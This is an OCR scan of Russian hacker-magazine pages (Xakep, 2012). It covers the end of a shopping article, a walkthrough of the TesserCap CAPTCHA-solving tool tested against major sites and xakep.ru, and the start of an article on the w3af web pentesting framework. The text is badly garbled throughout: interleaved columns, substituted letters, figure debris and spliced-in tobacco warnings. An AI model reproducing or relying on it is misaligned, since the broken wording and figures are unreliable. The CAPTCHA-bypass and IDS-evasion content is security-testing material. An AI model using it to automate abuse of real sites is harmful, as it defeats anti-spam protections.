бы не. зто, то магазин занял бы достойное

отnравки не той модели, а то, что все попытки как-то решить проблему не увенчались

но nосылки отправляют обычной почтой и без

и TinyDeal .

успехом. Возможно , через

трекинга .

PayPal

было бы

место рядом с моими фаворитами FocaiPгice

проще открыть диспут, но не факт.

ЗАКЛЮЧЕНИЕ

можно сэкономить . Если товар без отзывов­

обращайся в службу поддержки. Н е забывай :

В заключен и е хочетс я до ба вить , что о дин и тот

обязательно уточняй комплек тацию и харак­

китайские интернет-магазины лишь для тех,

же товар может быть во многих магазинах,

теристики : нередко присылают нечто отличное

кто может ждать . Е сли что -то нужно здесь и

но по разным ценам. П озтому сначала сравни

от указанного в описании. Чтобы максимально

сейчас, то лучше сюда даже не заглядывать. И

и только потом совершай заказ. Не поленись

обезопасить себя, оплату л у чше пров одить

главное правило: тот, кто ищет, всегда найдет.

поискать в Сети куnоны на скидку, с ними

через PayPal. В случае проблем обязательно

Удачных покупок' ::Х::

ХАКЕР

03/158/2012


PCZONE

Гурсев Синг х Калра 1gursev.kal ra!a foundstone .com 1

ка н ость ТЕСТИРУЕМ УНИВЕРСАЛЬНУЮ РАСПОЗНАВАЛКУ САРТСНА

Ес ть ра з ные способы для обхода САРТСНА, которыми защищены с а й ты . Во - первых , суще с твуют с п е ц и альные сервисы,

РЕШИТЬ САРТСНА

ем. Взлом Сарtс h а-фи л ьтров» из

#1 35

и

#126

Р ас п озна в а н ие СА Р ТС Н А - задача чаще в сего

номеров соответс т венно. Сегодня же я хочу

нетривиальна я . Н а изображение необходимо

ра сс казать тебе о разработке TesseгCap, ко т о ­

накладывать массу раз л ичных фильтров, что­

рую ав т ор называет универсальной решалкой

бы убрать искаже н ия и п омехи, которыми раз­

СА РТ СНА. Любопы т ная штука, как ни кру т и.

работчики желают укрепить стойкость за щ и т ы.

ПЕРВЫЙ ВЗГЛЯД НА TESSERCAP

к оторые и спользуют дешевый

Зач а стую п риходится реализо в ыват ь обучае ­

ручно й труд и бу к вально за $1

мую сис т ему на ос н ове нейронных сетей [зто,

Ч то с д елал автор п ро г раммы? О н посмотре л ,

предлагают решить

к слову, не так с л ожно, как може т показа ть­

как обычно подхо д ят к п р облеме автоматизи­

ся], чтобы д обиться п р иемлемого результ а т а

ро в ан н ого решения СА Р ТСНА и по п робовал

по ав т оматизиро в анному р ешению капч. Ч тоб ы

обобщить этот опыт в о д ном и н струмен т е .

понять, о чем я говорю, лу чш е п о д нят ь архи в

Автор заметил, что для удаления ш умов с изо ­

1000

капч.

В к ачестве альтернативы м о ж н о попробовать написать и нтелле к туальную с и стему,

и прочи т ать заме ч ате л ь н ые ста т ьи <<Вз л ом

браже н ия, т о ест ь реше н ия самой слож н ой

САР Т С Н А: теория и прак т ика. Р азбираемся,

задачи при распознавании капч, чаще все г о

как л омают ка п чи» и << П о д смо т рим и рас п озна-

применяются одни и те же фильтры. П олучает-

кот орая по опред е ленным

алгор и т м а м будет сама выполнять распознавание .

САРТСНА

Обработанная САРТСНА

Распознанный текст

Последнее теперь можно

HMLR

р е ал из ова т ь с по м ощью

с пец и альной утилиты .

01,2

С хема анализа САРТСНА- изображени й с помощью

TesserCap

ХАКЕР

03/158/2012


Проверка на прочность

с я, что если реализовать удобный инструмент, позволяющий без сложных математических

~ ~-

.....

-

преобразований накладывать фильтры на изо ­

[: 4152\4'] ~ ~~-- ·::

бражения, и совместить его с ОСR-системой

-

- -

... _

вполне работоспособную про грамму. Это, с обстве нн о, и сделал Гурсев Сингх Калра

из компании

McAfee. Зачем

--·==

... 1

L41 ~2~

для распознавания текс т а, т о можно получить

з т о было нужно?

1

41~2\А

Автор утили т ы решил таким об раз ом про­

\ 'О=

верить, насколько безопасны капчи к рупных ресурсов. Для тестирования были выбраны т е

-·1 -~ 1

~- ,------

""---""""""""'

Wiilli)

о

-

.

.

1 ~- 1 4755535

[~ __j ·1 ·~3

G1

tт:U.

-

11~

l ~k l 1 ~70 ЭИН

[

интер нет- сайты, которые являют ся са мыми

105Ul76

~~or.- ::::1

ь:

.... ,..с--

J

Предварительная обработка изображений и и з влечение

Кандидатами на участие в т естировании стали

текста из капчи

Wikipedia,

еВ ау, а также

-~

Ufff:i

--·--·-- -

~

~

...

статистики www . quaпtcast . com/top-sites-1 .

провайдер капч гeCaptcha.

-

11 о 1 1" liJ G 1 1 ~269

посещаемыми по версии известного сервиса

такие монстры, как

~~ c:::::!LJ

. _:l/flilf[~

Результат анализа капчи xakep.ru с предварительной обработкой изображений . Судя по результатам, фильтр подобрать не удалось

ИНТЕРФЕЙС. ВКЛАДКА MAIN П осле з ап уска программы п еред нами пред­

нужно о ценить результаты рас по з нав а н ия

принцип функционирования программы, т о о н

стает окно с тре мя вкладками:

изображений, о тм етив каждый из них как

достаточно прост. Исходная капча поступает

lmage

в систему предварительной обработки изо­

содержит элементы управления, которые

няя, наиболее значимая функция служит для

бражений, очищающей кап чу от всяких шумов

исnользуются для зап у ска и остановки теста

передачи любого изображения в систему nред­

и искажений и по конвейеру передающей по­

САРТСНА-изображения, формирования ста­

варительной обработки, в которой задается

лученное изображение ОСR-системе, которая

ти стики т еста !сколько отга дан о, а сколько

фильтр, удаляющий с изображения шумы и ис­

с тарается распознать текст на нем . TesseгCa p

нетl, навиг а ци и и выбора изображения для

каже ния. Чт обы передать кар т инку в сис т ему

имеет интерактивный графиче ский интерфейс

предварительной обработки. В поле для ввода

предварител ьн ой обработки, на д о щелкнуть

и обла да е т следующими свойст в ами :

URL-aдpeca должен быть указан точный

на требуемом изображении nравой кноnкой

Е сли рассматривать в об щи х черта х

1.

2.

3.

Ma in, Options,

P гepгocessing. Основная вкладка

коррек т н ы й или некорректный . Н у и послед­

URL-

Имеетуниверсальную систему пре двар и ­

aдpec, который веб-приложение использует

мыши и в кон т екс т ном меню выбрать пункт

тельной обработки изображений, которую

для извлечения капч. URL-aдpec можно по­

Send

можно на строить для каждой отдельной

л учить следующим образом: кликнув правой

lmage

Рг ергосеssог.

ИНТЕРФЕЙС. ВКЛАДКА OPTIONS

капчи.

к н о nко й мыши

Включает в себя сис тем у распознавания

скопировать или просмотреть код страницы

Вкладка о пци й со д ержит различные злементы

Tesseгact, которая извлекаеттекст из пред­

и извлечь URL-aдpec из атрибута sгс тега изо ­

уnравления для конфигурирова ния TesseгCap.

варительно проанализированного и под­

бражения

Здесь можно выбрать ОСR-систему, за д ать

готовленного САР Т С Н А - изоб ра жения.

гu зто адрес www.xakep.гu/common / гateit/

Поддерживаетиспользованиеразличных

captcha.asp?name = xakep . гu . Ряд ом со стро-

сацию и предварительную обработку изобра­

ко дир овок в системе распознавания .

к ой а др еса находится элеме нт, задающий

же ни й, добавить пользовательские НТТР­

к оличество капч, которые н ужно загрузить

за головки , а также указать диапаз о н символов

Думаю, общий смысл понятен, поэто м у

для тестирования. Та к как приложение может

для системы расnознавания: цифры, буквы

no

<img>.

САРТСНА-изображению,

То

Н апример, в случае с

xakep.

предлагаю посмотреть, как это выглядит .

одновременно nоказывать только

Универсал ьн ость утилиты н е могла не приве­

б р ажений, в нем предусмотрены элементы

сти к усложнению ее интерфейса, п оэтому ок н о

у пр авления для постраничного п ролистывания

программы может вв ести в небольшой с т у пор .

загружен ны х кап ч . Та ким образом, при мас­

12

изо­

параметры веб-прокси, включить nереадре­

в нижнем регистре, буквы в верхнем регистре , сnециальные символы.

Теперь о каждой оnции поподробней . Пр еж д е всего, можно выбрать ОСR-систему.

Так что, перед т ем как п ереходить н е п ос ред­

штабном тестировании мы сможем nроли­

П о умолча нию д оступна только одна ­

ствен н о к ра спознаванию капч, предл агаю

ст ыв ать загруженныекапч ии пр осматривать

Te sseгact -ORC , так что замора чивать ся

разобраться с ее интерфейсом и заложенным

результаты их распознавания. Кнопки Staгt

с выбором т ут не придется. Еще одна очень

функциона л ом.

и

интересная возможность программы- вы­

Stop запускают

и оста н ав лива ют тестиро­

вание соо тветствен но. По с ле те с т ирования

бор диапазона символов . Возьмем, напри­ мер, капчу с xakep . гu- видно, что она не со­

д е ржит н и одной букв ы , а состои т т о льк о из цифр. Так зачем нам лишние символы, которые только увеличат вероятность не кор­

ОБАВТОРЕ

р ектного распознавания? Конечно, они нам ни к чему, поэтому при тестировании капчи

xake p.гu лучше указать, что она содержит Мы не могли не сказать х отя бы пары слов об

Подразделение профессиональны х услуг

о дни цифры: Num eгics. Но что если выбрать

авторе замечательной утилиты TesseгCap .

FoundstoneФ, в котором он трудится, nредлагает

Uррег

Его зовут Гурсев Синг х Калра . Он работает

организациям эксnертные услуги и обучение,

п ознать капчу, состоящую из заглавных букв

главным консультантом в подразделении

обесnечивает nостоянную и действенную

любого языка? Н ет, не сможе т. Пр ограмма бе­

профессиональных услуг

защиту их активов от самых серьезных угроз.

рет список символов, используемых для рас­

в х одит в состав

Команда nодразделения nрофессиональны х

познавания, из конфигурацио нны х файлов,

услуг состоит из признанных экспертов

находящихся в \Ргоgгаm

в области безоnасности и разработчиков,

Fг ее Too l s\TesseгCa р

Foundstone, которое комnании McAfee . Гурсев

выступал на таких конференциях, как Тоог­ Соn ,

NuiiCon

и

ClubHack. Является

автором

Case?

Сможет ли пр ограмма рас­

Files\ Foundstone 1.0\tess data\co nfig s\ .

инструментов TesseгCap и SSLSmaгt . Помимо

имеющих богатый оnыт сотрудничества

П оясню на прим ере : если мы выбрали

это го , разработал несколько инструментов для

с международными корnорациями

опции Numeгics и L oweг

внутренних нужд комnании . Любимые языки

и государственными организациями

обратится к файлу loweгпumeгic, начинаю­

по воnросам безоnасности .

щ емуся с параметра tessedit _ chaг_whitelist.

программирования-

ХАКЕР

03/158/ 2012

Ruby, Ruby on Rails

и С#.

Case,

то пр ограмма


PCZONE За ним следует список символов, которые

ИНТЕРФЕЙС . ВКЛАДКАIМАGЕ

будут использоваться для решения капчи.

PREPROCESSING

По умолчанию в файлах содержатся только

Н у вот мы и добрались до самой интересной

буквы латинского алфавита, так что для рас­

вкладки . Именно т ут настраиваются фил ьт ры

познавания кириллицы надо заменить или

для у д а л е н ия с капч различных шумов и раз­

мытий, которые стараются максимально

дополнить список символов.

Теперь немного о том, для чего нужно поле

Http Request

Headeгs. Например, на не­

Процесс настройки универсального фильтра предельнопрости состоит из девяти эта п ов.

того чтобы увидеть капчу. Чтобы TesseгCap

Изменения изображения отображаются на

смогла получить доступ к капче, программе

каждом этапе предварительной обрабо т ки.

необходимо передать в запросе НТТР такие

Кроме того, на странице имеется компо-

заголовки, как Ассер!,

нент проверки, который позволяет оценить

и Rеfеггег

и т. д . Используя веб-прокси IFiddleг, Вuгр, Chaгles, WebScaгab, Рагоs и т. д.l, можно перехватить посылаемые заголовки запро­

са и ввести их в поле ввода

наложенном фильтре. Рассмотрим подробно каждый этап.

H eadeгs. Еще одна опция, ко т орая навер ­

Этап

няка пригодится,- это

На данном этапе инвертируются цвета

Rediгects.

Веб-сайт

Доля распознанных капч

Wikipedia

20-30%

ЕЬау

20-30%

reddit.com

20-30%

CNBC

>50%

foodnetwoгk.com

80-90%

dailymail.co. uk

>30%

megaupload .com

>80%

правильнесть распознавания капчи при

Http Request

Follow

САЙТАХ

усложнить задачу системе распоз н авания.

которых веб-сайтах нужно залогиниться, для

Cookie

РЕЗУЛЬТАТ ПРОВЕРКИ САРТСНА НА ПОПУЛЯРНЫХ

1.

Инверсия цвета

Дело в том, что TesseгCap по умолчанию

пикселей для САРТСНА-изображений. Код,

не следует переадресации. Если тестовый

представленный ниже, демонстрирует, как это

pasteЬin.com

70-80%

URL-aдpec должен следовать переадресации

происходит:

cavenue.com

>80%

для получения изображения, нужно выбрать эту опцию.

Ну и осталась последняя опция, вклю­

чающая/отключающая механизм предвари­ тельной обработки изображений, который мы рассмотрим далее. По умолчанию предварительная обработка изображений отключена. Пользователи сначала настраи­ вают фильтры предварительной обработ-

for(each pixel in

САРТСНА)

компоненты для всех пикселей изображения.

{

Каждое числовое поле может содержать

if (invertRed is true) new red = 255 - current red if (invertBlue is true) new Ыuе = 255 - current Ыuе if ( inve r tGree n is true) new green = 255 - current green

компонентов каждого пикселя в зависимости от значения в поле выполняются следующие

действия:

1.

САРТСНА-изображениям и затем активируют загружаемые после включения опции ЕпаЫе

lmage

Pгepгocessiпg, проходят предвари­

Если значение равно

-1, соответствующий

цветовой компонент не меняе т ся.

ки изображений согласно тестируемым этот модуль . Все СА РТ СНА-изображения,

257

lот -1 до 2551 возможных значений. Для RGВ­

2.

Если значение не равно

-1,

все найденные

компоненты указанного цвета !красный, зе­

Инверсия одного или нескольких цветов

леный или синий] меняю т ся в соответствии

часто открывает новые возможности для про­

веркитестируемого САРТСНА-изображения.

с введенным в поля значением. Значение О удаляет компонент, значение

тельную обработку и уже затем передаются в ОСR-систему Tesseгact для извлечения

Этап

2. Изменение

цвета

текста.

На данном шаге можно изменить цветовые

255 устанав­

ливает его максимальную интенсивность

и т. д.

Этап

3. Градация

серого !Шкала яркости)

На третьем эта п е все изображения конверти ­ руются в изображения в градациях серого . Это Chop"""' O Activ.ste

11 <· 1 t~

единственный обязательный эта п п реобразо ­ вания изображений, ко т орый н ельзя про­ пустить. В зависимости от выбранной кнопки выполняется одно из следующих действий, связанных с цветовой составляющей каждого пикселя:

Aveгage -71Red + Gгееп + Bluel/3 . 2. Humaп -7 10.21 • Red + 0.71 • Gгееп + 0.07 • Bluel . 3. Aveгage of minimum апd maximum соlог componeпts -?IMiпimum IRed + Gгееп + Blue) + Maximum IRed + Gгееп + Blue ll /2 . 4. Miпimum -7 Miпimum IRed + Gгeen + Bluel. 5. Maximum -7 Maximum IRed + Gгееп + Bluel.

1.

В зависимости от интенсивности и рас­

пределения цветовой составляющей САРТСНА любой из этих филыров может улучшить @ Smooth Mack 1

0

Q S~M~2

Q S~~M~2

Sh.vpen Ммk 1

0

извлекаемое изображение для дальнейшей

Sharpen Ммk З

Q S~M~S

0

обработки . Этап

4.

Сглаживание и резкость

Чтобы усложнить извлечение текста И з мен е ни е по м ех при изменении различны х д и апазонов цветового з начения пи к сел ей в сторону белого или черного

из САРТСНА-изображе н ий, в них д обавляют

Х АКЕР

03 /158/2012


П рове р ка на п ро чн ос ть

шум в форме однопиксельных или многопик­

выдается ошибка и маска не при меняе т ся.

Этап

сельных точек, посторонних линий и пре­

П ри выборе фиксированной маски кнопку

Это т фи льт р строит г рафик з а висимости з н аче­

етранетвенных искажений . При сглаживании

Save Mask

использовать не требуется.

5. Вводим

Этап

фильтры

Н а этом этапе обработки изображения е г о

Passes

Cutoff.

В числовом поле

следует указать, сколько раз нужно

ния уров н я серо г о о т частоты

(cutoff) встречаемос т и

работы о т секаю щ его фи льт ра п оказа н ни же

устранения которого потом используются

или

Настройка отсечения

и предлагае т выбрат ь отсечение . П ри нц и п

изображения возрастает случайный шум, для

Bucket

6.

оттенки серого

в п сев д око д е :

пиксели могут быть окрашены в широкий

применить с~ответствующую маску изобра­

диапазон оттенков серого. Этот фильтр ото­

жения перед переходом на следующий этап.

бражает распределение градаций серого

Давай рассмотрим компоненты фильтра для

в

сглаживания и повышения резкости. Доступ­

пикселей, окрашенных в оттенки серого

ны два типа масок изображения:

в диапазоне от О до

20 баке т ах [Ьuсkеt)/диапазонах. П ро ц ен т 12,

указан в ба кете О,

if (pi xe l 's gr ays cal e value <= Cutoff ) pixel graysca l e val ue = ( е OR 255) - > в зави с им о сти, о т т о го как а я опция выбра н а (<= и ли => : Set Every Pi xel with valu e <=/ => Th r eshold t o е. Rema i ning t o 255 )

Фиксированные маски. По умолчанию

процент пикселей, окрашенных в о тт енки

TesseгCap имеет шесть наиболее популяр­

серо г о в диапазоне от

ных масок изображения. Эти маски могут

сглаживать изображение или повышать

из следующих действий для каждого диа­

ние пикселей САР Т С Н А по цвета м и п омо г ае т

резкость [преобразование Лапласа). Из­

пазона значений, соо т ветствующих оттенкам

удалить п омехи с помощью отсе ч ения з н а ч е­

менения отображаются сразу же после вы­

серого:

ний уро вн я серого .

бора маски с помощью соответствующих

1. Остави т ь без измене н ия [Leave As ls). 2. Заменить белым [White). 3. Заменить черным [Biack).

Этап

кнопок.

Пользовательские маски изображения.

13

до

25,-

в ба кете

т. д. Пользователь может выбрать одно

7: Обтесывание (choppiпg)

После применения с глаживаю щ е г о, отсекаю­

ще г о,

Юзертакже может настроить пользова­ тельские маски обработки изображений,

График показывает п о д роб н ое рас пр е д е л е ­

Бла г одаря этим оп ц иям можно контроли­

bucket-

и д ругих фи л ьтро в САР Т С Н А ­

изображе н ия всё е щ е могут быт ь за ш у м ле н ы

вводя значения в числовые поля и нажи­

ровать различные диапазоны оттенков се­

однопиксельными или много п иксе л ьными

мая кнопку

рого, а также сокращать/удалять шум, меняя

точками, посторонними линиями и п реетран ­

оттенки серого в сторону белого или черного.

етвенными искажениями . П рин ц и п рабо т ы

Save Mask . Если

сумма коэф­

фициентов в этих окошках меньше нуля,

' J •' '. /

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ:

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ


PCZONE РАСПОЗНАЕМ КАПЧИ

фильтра обтесывания зак л ючается в следую­

меняет его значение уровня серого новым,

щем: если количество смежных пикселей,

как показано ниже в псевдокоде. Инверсия

окрашенных в данный оттенок серого, мен ь ше

серого проводится для подгонки изображе­

этой утилиты, и теперь неплохо было бы про­

величины в числовом поле, фильтр обтесы в а­

ния под ц в етовые настройки ОСR-системы.

тестировать какую-нибудь капчу на прочность.

ния п рис в аивает им з н аче н ие О [ ч ерный ! или

255 [белый! п о в ыбору п о л ьзователя. П ри э т ом САР Т С Н А анализируется как в горизонталь­ ном, так и в вертикал ь ном направлении.

Ну что ж, пожалуй, мы рассмотрели все опции

Предлагаю для примера взять кап чу xakep.гu.

for(eac h pi xel i n САРТ С НА ) new grayscale value = 255 - current graysc al e value

Итак, запускаем утилиту и идем на сайт журнала . Видим список свежих новостей, за­ ходим в первую попавшуюся и пролистываем

до места, где можно оставить свой коммента­ Этап

8: Изменение

ширины границы .

Этап

10: Проверка

распознавания капчи

рий. Ага, коммент так просто не добавить [еще бы, а то бы давно уже всё эаспамилиl- нужно

Как у тв ерж д ает автор ути л и т ы, в ходе

Цель данного этапа - передать предвари­

п ерво н ачаль н ых и сс л е д ова н ий и разра­

тель н о обработанное САРТС Н А-изображение

вводить капчу. Н у что ж, проверим, можно

ботки TesseгCap он неоднократно отмечал,

ОСR-системе для распознавания. Кнопка

ли это автоматизировать . Копируем

что, когда САРТСНА-изображения имеют

Solve

берет изображение после фильтра

URL

картинки и вставляем его в адресную строку

толстую граничную линию и ее цвет отлича ­

инверсии серого, отправляет в ОСR-систему

TesseгCap . Указываем, что нужно загрузить

ется от основного фона САРТСНА, некоторые

для извлечения текста и отображает воз­

капч, и нажимаем Staгt . Программа послушно

вращенный текст в графическом интер­

загрузила

Д анный фильтр п редназ н ачен для обрабо т ки

системы

фейсе. Если распознанный текст совпадает

познать. К сожалению, все капчи оказались

OCR

не могут рас п ознать текст.

12

12

картинок и попыталась их рас­

граничных линий и их изменения. Граничные

с текстом на капче, значит, мы правильно

либо не распознаны, о чем свидетельствует

линии с шириной, которая указана в число­

задали фильтр для предварительной об­

надпись

вом поле, окрашиваются в черный или белый

работки. Теперь можно перейти на вкладку

неправильно. В общем, неудивительно, так

по выбору пользователя.

опций и включить опцию предварительной

как посторонние шумы и искажения не были

обработки [ЕnаЫе

удалены. Этим мы сейчас и займемся . Жмем

Этап

9: Инверсия

серого оттенка

Это т фи л ьтр п роходит каж ды й пиксель и за-

lmage Pгepгocessiпgl для

-Failed-

под ними, либо распознаны

обработки всех последующих загруженных

правой кнопкой мыши на одну из

капч.

женных картинок и отправляем ее в систему

12

загру­

МИНЗДРАВСОЦРАЗВИ1ИЯ РОССИИ ПР~ДУ


Пр оверка на пр о чн ость

nредварительной обработки

[Send То lmage

Ргергосеssог]. Внимательно рассмотрев все

ЗАКЛЮЧЕНИЕ

В конечном итоге, как я ни бился, нормально

САРТСНА - изображения являются одним

распознать кап чу у меня так и не получилось .

из самых эффективных механизмов по защите

ры, поэтому идем на вкладку опций и указы ­

Пришло сь экспериментировать с pasteЬin.

веб -приложе ний от автоматизированного за­

ваем, что распознавать нужно только цифры

com,

[Сhагасtег

12

капч, видим , что они содержат только циф­

Это, как видишь, совер шенно неверно.

которые без проблем удалось рас­

полнения форм. Однако слабые капчи смо г ут

Set; Numeгics]. Теп ерь можно п е реходить на вкладку lmage Pгepгocessing

познать. Но если ты окажешься уси дчивее

защити ть от случайных роботов и не устоят

и терпеливее и сумеешь получить кор­

перед целенаправленными попытками их

для настройки фильтров. Сразу скажу, что

ректное распознавание капч с xakep.гu, то

решить. Как и криптографические алгоритмы,

п о игравшись с первыми тремя фильтрами

сразу заходи на вкладку опций и включай

САРТСНА-изображения, тщательно проте­

[ << Инверсия цвета>>, <<Изме нение цвета >>,

пре дв арительную обработку изображений

стированные и обес п ечи в ающие вы сокий уро­

<< Градация серо г о » ] я не увидел никакого по­

[ЕnаЫе

lmage Pгepгocessing]. Затем пере ходи

вень безопасности, являются самым лучшим

ложительного эффекта, поэтому оставил там

на

и, кликнув на Staгt, загружай свежую

способом защиты. На основе статистики,

всё по дефолту. Я выбрал маску

порцию капч, которые теперь будут пред­

которую привел автор программы, я выбрал

варительно обрабатываться твоим филь­

для своих п роектов гeCaptcha и буд у реко­

Smooth Mask

установил количество про ходов равным

Main

тром. П осле того, как программа отработает,

мендова ть ее всем своим друзьям- она ока ­

залась самой стойкой из протес т ированных.

которых меньше, нужно установить в О, а те,

отметь корректно/некорректно распознан­ ные капчи [кнопки Магk as Соггесt/Магk as l nCoггect] . С этого момента можно просма­

которых больше, в

тривать сво дн ую статистику по распознава­

полуавтоматизированное решение САРТС Н А.

нию с помощью

Через специальный

одному. Фильтр Gгayscale

buckets

я пропустил

и перешел сразу к настройке отсечения . Вы­ б рал значение

154

и указал, что те пиксел и,

255.

Чтобы избавиться

о т оставшихся точек, включил

chopping

и из­

Show Statistics . В

общем-то ,

В любом случае не с тоит забы вать , что в Сети есть нема ло сервисов, которые предлагают

API

ты передаешь серви­

это своеобразный отчет о защищенности той

су изображение , а тот через непродолжитель ­

фильтр включать не было смысла, поэтому я

или иной САРТСНА. Если стоит вопрос о вы­

ное время во звра щает решение . Решает ка пч у

с разу нажал на

боре того или др угого решения, то с помо­

реальный человек [например, из Китая ] , п о­

щью TesseгCap вполне можно провести свое

лучая за это свою копеечку. Ту т уже никакой

собственное тестирование.

защиты нет : ]. ::::к:

менил ширин у границы до

10. Последний

Solve.

На капче у меня было число н о программа распознала его

714945, как 711435.

Содержание в дыме сигареты: смолы - 4; 7 мг, никотина- 0,4; 0, 6 мг, С О- 5; 8 мг

1Р~ЖДА~Т: КУР~НИ~ ВР~ДИТ ВАШ~МУ ЗДОРОВЬЮ


PCZONE

Тара с Иващен ко

loxdeflaoxdef.info] ·

~-

v

ФРЕИМВОРК

[!]·

для веб-пентестера

·~

Ин форм ац и я пред ст авп е н а и с кл юч и т ел ьно для о з н ак о м ления .

Редакция не нес е т отв е тственности

ТЕСТИРУЕМ БЕЗОПАСНОСТЬ ВЕБ-ПРИЛОЖЕНИЯ С ПОМОЩЬЮ WЗAF

за е е использование в прот и во з а к о н ны х

целя х. nодобные

де йствия вл ек у т з а с обо й уголовно е преследование .

Прое к т wЗaf с и льно выделяется сред и мног их други х инструм е нтов для ис с ледования

безопасности веб-приложени й. Это

не обычны й сканер с жестко забитым функционалом , а фреймвор к, позволяющи й

и спользовать более сотни различных плагинов для исследования сайта, поиска уязвимасте й и их последующей эксплуатации . ЧТО ТАКОЕ WЗAF? Совреме н ные веб-приложе н и я уже мало чем похожи н а своих п ред­ ш естве н нико в , ко т ор ы е бы л и в ход у е щ е п я т ь л ет н аза д . Они стано ­ вятся всё более популярными, ис п ользуют намного больше техно­ логий, что увеличивает возможный вектор атаки, обрабатывают всё больше разной информации, включая финансовые и переанальные данные . Чтобы снизить риски, мы можем внедрить процес с безоnас­ ной разработки п рограммна го обеспечения, важным эт апом которого является тес т иро в ание безопас н ости. Услов н о говоря , можно выде­ лить чет ыре в ида тестиро в ания безопасности веб - приложения :

1. Автоматизированноесканированиенауязвимос т и. 2. Ручноетестированиебезопасностиlпентестин~ . 3. Статическийанализкода. 4. Аудит кода.

-

n

Сегодня я хочу рассказа т ь о проекте wЗaf lwЗaf. oгg l . Это фреймворк !Web Applicatioп Attack and Audit F гamewoгkl , который может быть исполь зова н для для тестирования бе зо пасности в еб-приложения

первых двух видов тестирования. Автором этого открытого проекта является Андреас Рианчо из Аргентины. Сейчас проект разрабаты­ вается nреимущественно им и небольшой гру nn ой контрибьюторов

со все г о мира, в ко т орую вход ит и ав т ор этих строк

,._ ~.ы. jNII'amtWI axllt

ним также принимают активное участие такие известные компании,

·-·""""""'

. ..... ..,"",_ Plugin

..

N:Jt.ie

-.

:1. В работе на д

Thll ptugln 1nr:ts СIОМ 5118 SCI\ping (XSS) 'o'lllntl'.ьllllin.

как

TolndXSS~twpluglnwllstl'lda . . ofi81161C:11pttmoJD8\II!Yp61."....., andsнrctlforfllllnpulln . hlltlpCIIIИ. Тhepaiiiii'IМtr "~c:onev.nsltoepkqniOIIOAIIIO.Ifi~IOhwetlfC)pliedon 81'1d81h.,..;l, requnt .. P'Qt$4!CI'in~bflolqu:twrцnOtiOICII«ЬOttlminllhoWI'I\CII'I)'

~НinQS .,I иntlarmylr1к'ion~

~

Rapid7

и Я ндекс! Фреймворк написан на

Python,

который, как ты

знаешь, является << языком с батарейками>>. Батарейки wЗ af- зто его расширения, которы х набралось уже больше сотни. Это, конечно, еще не

Mozilla

Fiгefox, но уже достаточно мощное средство .

A" tfl'lliiRtOOtl r.1 <,« '*"IFilt

Q

.Z II.Я.

,_,

~ l!miFill

tМckSIONd

1:3

111111'A:18f01CМC~~s l 3

о

1 Oi

КАК УСТРОЕН WЗAF? Фреймворк wЗaf состоит из двух важных частей: ядра и плагинов.

Главное окно wЗaf

Ядро запускает главный nроцесс и координир ует работу плагинов ,

ХАКЕР

03/158/2012


Фреймворк для пенте с т ера

,·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- - ·- ·- ·- ·- -, - · - · - · - · - · - · - · - · - · - · - ·,

: (Discivery)

к в еб -nрил оже нию и его ответах . Если о nять пров ес ти аналогию

.

с миром

(вrutforce) ~ : •

1

UNI X, это фактически эквива л ен ттекс т ово го nотокового sed, н о ужедля НТТР-транз акций. Заме нить во всех от­

редактора

ветах hidd en -n oля на обы чны етекстовые? П ожалуйс т а! Еvаsiоn -nлагины исnользуются для обхо д а nростых nравил раз­

7.

личных 105. Хо чеш ь nодальше оставаться незамече нным nр и nр о­ ведении очередного nентеста веб -nр иложения? То гда исnользуй

что-нибудь из этого набора.

8.

Оutрut-nлагины выn ол няют простую миссию: формируют в удо бо­ читаемом виде о т четы о результатах работы wЗaf. Вы бирай, что тебе больше nодходит-<<nравославныЙ >> текстовый форма т или

И нфо рмаци о нный nоток в wЗaf

<<э нтерn райз н ый>>

POF,-

или nо-быстрому наnиши более nод­

ходящий для твоих нужд nлагин . а так же обме н инфо рмации между ними. Плаг ины, в с в ою очередь,

9.

Аuth-nлагины берут на себя весь nроцесс уnравления nоль­

находятуязвимости и п озволяют пр оэкс пл уа тировать их. Ч ерез ядро

зо в ательской сессией: авторизируются в веб-nриложении,

плагины обмениваются информацией, к прим еру, о найденн ых запро­

nроверяют, чтобы сессия оставалась вали дн ой, и выnолняют в

сах для фаззинга. В к аче с тве ц ентрального хранилища информации

конце сканирования корректный выход из веб-nриложения. Это

выст у паеттак называемая «б аза з наний >>.

о ч е нь уд обно. Ещ ё со в сем н е давн о не б ыл о удоб н ой возможности

Слово «фрейм ворк >> в названии разработки у п отребляется не слу ­ чайно . WЗaf пр е д оста вля ет платформ у, в то время как весь функцио­

сканировать nользовательские части веб-приложений, то ес ть те, что на хо дятся за авторизацией. Да , можно было указать wЗaf

нал для пентеста реализован в разных плагина х. Для каждого нового

исnользовать nредварит ельно nолученную и з браузера куку, н о

ск анир ова ния ты можешь выбирать только нужные тебе аддоны,

это н е самый уд обный сnособ. Сейчас в составе wЗaf всего один

комбинируя их. Плагин каж дого типа, котор ы х в общей сложности на­

аuth -n лагин, но он nодойдёт для большинства случае в. Д а и не

счи тываетс я восемь, отвечает за выполнение о пр е деленной за дач и .

забывай, что мы имеем д ело с фреймворком, и можно наnисать

1. Плагины для поиска в оз можны хточек в хо да в пр иложение !или та к

такой nлагин nрактически для любой формы ауте нт ификации:

называемые disсоvегу-плагиныl собирают формы , ссылки и вообще

SMS, токены

и т.n . У тебя в руках вся мощь Python!

всё, что можетсгенерироватьзапрос к в еб- пр иложению. Та ким об­ ра зо м формируется карта запросовтестируемого приложения . Хо ­ рошим прим ерам та ко го плагина является классический веб-паук ,

Теnерь, когда мы не много разобрались с архитектурой wЗaf, настало

скаются в цикл е, благодаря ч ему цели , обнаруженные на пр е дыду­

время у видеть его в д ействии. Сnециа льн о для д емо н с трации я на­

щем этапе, п о падают на в хо д этих же плаг ино в на следующем э тап е.

nисал nростое, но оче нь <<вебдва нольное >> nриложение социальной

Этотnроцесс nродолжаетеядатех п о р, n ока не будет д ос тигн ут

наnравленнос т и nод названием ltte г. Да , это сер в ис для ведения

лимит, установленный для режима nои ска цел ей для фаззинга.

2. Аудит-nлагины исnользуютвывод nлаг инов !то есть т очки входа в nриложениеl для n оиска у я з в и мастей, кот орые nозволяютосу­ щест витьтакие атаки, какХSS, SQL-инъекция, IR)LFI и множество

микроблогов, и , я над еюс ь , он ста н е ттаким же nоnулярным, как его

ограниченный

140 символами на одно сообщение стар ши й бра т. :1

